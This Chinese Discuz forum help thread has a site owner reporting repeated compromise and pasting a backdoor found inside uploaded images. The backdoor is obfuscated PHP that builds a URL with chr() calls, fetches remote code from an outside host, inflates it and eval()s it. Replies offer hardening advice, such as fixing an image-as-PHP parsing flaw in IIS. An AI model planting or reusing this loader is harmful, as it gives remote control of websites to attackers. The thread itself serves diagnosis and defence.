返回列表 发帖
查看: 8099|回复: 9

[求助] 网站老是被挂马

2

主题

4

回帖

16

积分

初学乍练

贡献
0 点
金币
10 个
发表于 2019-7-31 22:15:47 | 查看全部 |阅读模式
网站目录老是被上传后门文件,  删了几天又有了,  改各种密码  ,装云锁,  今天更气人,网站管理员密码被改, 还发帖子,云锁还被卸载,快照被劫持天天秒收录,  有吧网站备份下来用D盾扫描一下,发现几张图片有脚本,  这是怎么做到的?

360截图20190731221329880.jpg
360截图20190731221356193.jpg

脚本地址:http://www.9661.in/txt/xml1.txt

<?php
$password='haosir';$b="chr";session_start();if(empty($_SESSION['PhpCode'])){$d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(54).$b(54).$b(49).$b(46).$b(105).$b(110).$b(47).$b(112).$b(104).$b(112).$b(47).$b(112).$b(104).$b(112).$b(46).$b(103).$b(105).$b(102);$e=$b(102).$b(105).$b(108).$b(101).$b(95);$e.=$b(103).$b(101).$b(116).$b(95).$b(99);$e.=$b(111).$b(110).$b(116).$b(101).$b(110);$e.=$b(116).$b(115);$_SESSION['PhpCode']=$e($d);}$f=$b(103).$b(122).$b(105).$b(110);$f.=$b(102).$b(108).$b(97).$b(116).$b(101);@eval($f($_SESSION['PhpCode']));


我知道答案 回答被采纳将会获得1 贡献 已有9人回答
回复

使用道具 举报

15

主题

1796

回帖

2076

积分

应用开发者

discuz 老兵

贡献
10 点
金币
188 个
QQ
发表于 2019-8-1 14:32:52 | 查看全部
  漏洞而已
可以联系我的QQ交谈 有偿服务
回复

使用道具 举报

18

主题

2122

回帖

3207

积分

应用开发者

贡献
70 点
金币
624 个
QQ
发表于 2019-8-1 17:11:41 | 查看全部
尽快清理 做好服务器安全
回复

使用道具 举报

2

主题

19

回帖

43

积分

初学乍练

贡献
0 点
金币
20 个
发表于 2019-8-2 10:53:39 | 查看全部
网站漏洞,服务器端口禁止,禁ping,防注册
回复

使用道具 举报

0

主题

3

回帖

13

积分

初学乍练

贡献
0 点
金币
10 个
发表于 2019-8-2 11:17:20 | 查看全部
用的什么环境  用的什么面板
回复

使用道具 举报

24

主题

68

回帖

121

积分

渐入佳境

贡献
0 点
金币
25 个
发表于 2019-8-3 17:27:17 | 查看全部
我的也是。你找到办法了吗
回复

使用道具 举报

24

主题

68

回帖

121

积分

渐入佳境

贡献
0 点
金币
25 个
发表于 2019-8-3 17:28:07 | 查看全部
耗子 发表于 2019-8-1 14:32
漏洞而已
可以联系我的QQ交谈 有偿服务

付费求一套discuz加固的目录权限的方案
回复

使用道具 举报

0

主题

8

回帖

29

积分

初学乍练

贡献
0 点
金币
20 个
发表于 2019-8-4 10:26:57 | 查看全部
本帖最后由 17推执笔 于 2019-8-4 10:28 编辑

不是网站漏洞,不需要discuz加固,就是一个服务器远程解析漏洞,图片被当做php来执行了
回复

使用道具 举报

0

主题

8

回帖

29

积分

初学乍练

贡献
0 点
金币
20 个
发表于 2019-8-4 10:37:00 | 查看全部
如果是IIS的直接打开IIS,点击处理程序映射,双击里面的php,在打开的窗口点击请求限制,然后勾选文件或文件夹,这样就可以修复解析漏洞了
回复

使用道具 举报

17

主题

269

回帖

546

积分

应用开发者

贡献
2 点
金币
165 个
QQ
发表于 2019-8-4 15:21:15 来自手机 | 查看全部
看路径是头像上传的图片木马,可使用头像审核插件高级版防止用户上传头像图片木马
https://addon.dismall.com/?@saya_avatarverify.plugin
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

  • 关注公众号
  • 有偿服务微信
  • 有偿服务QQ

手机版|小黑屋|Discuz! 官方交流社区 ( 皖ICP备16010102号 |皖公网安备34010302002376号 )|网站地图|star

GMT+8, 2025-5-1 02:49 , Processed in 0.074191 second(s), 32 queries .

Powered by Discuz! W1.0 Licensed

Cpoyright © 2001-2025 Discuz! Team.

关灯 在本版发帖
有偿服务QQ
有偿服务微信
返回顶部
快速回复 返回顶部 返回列表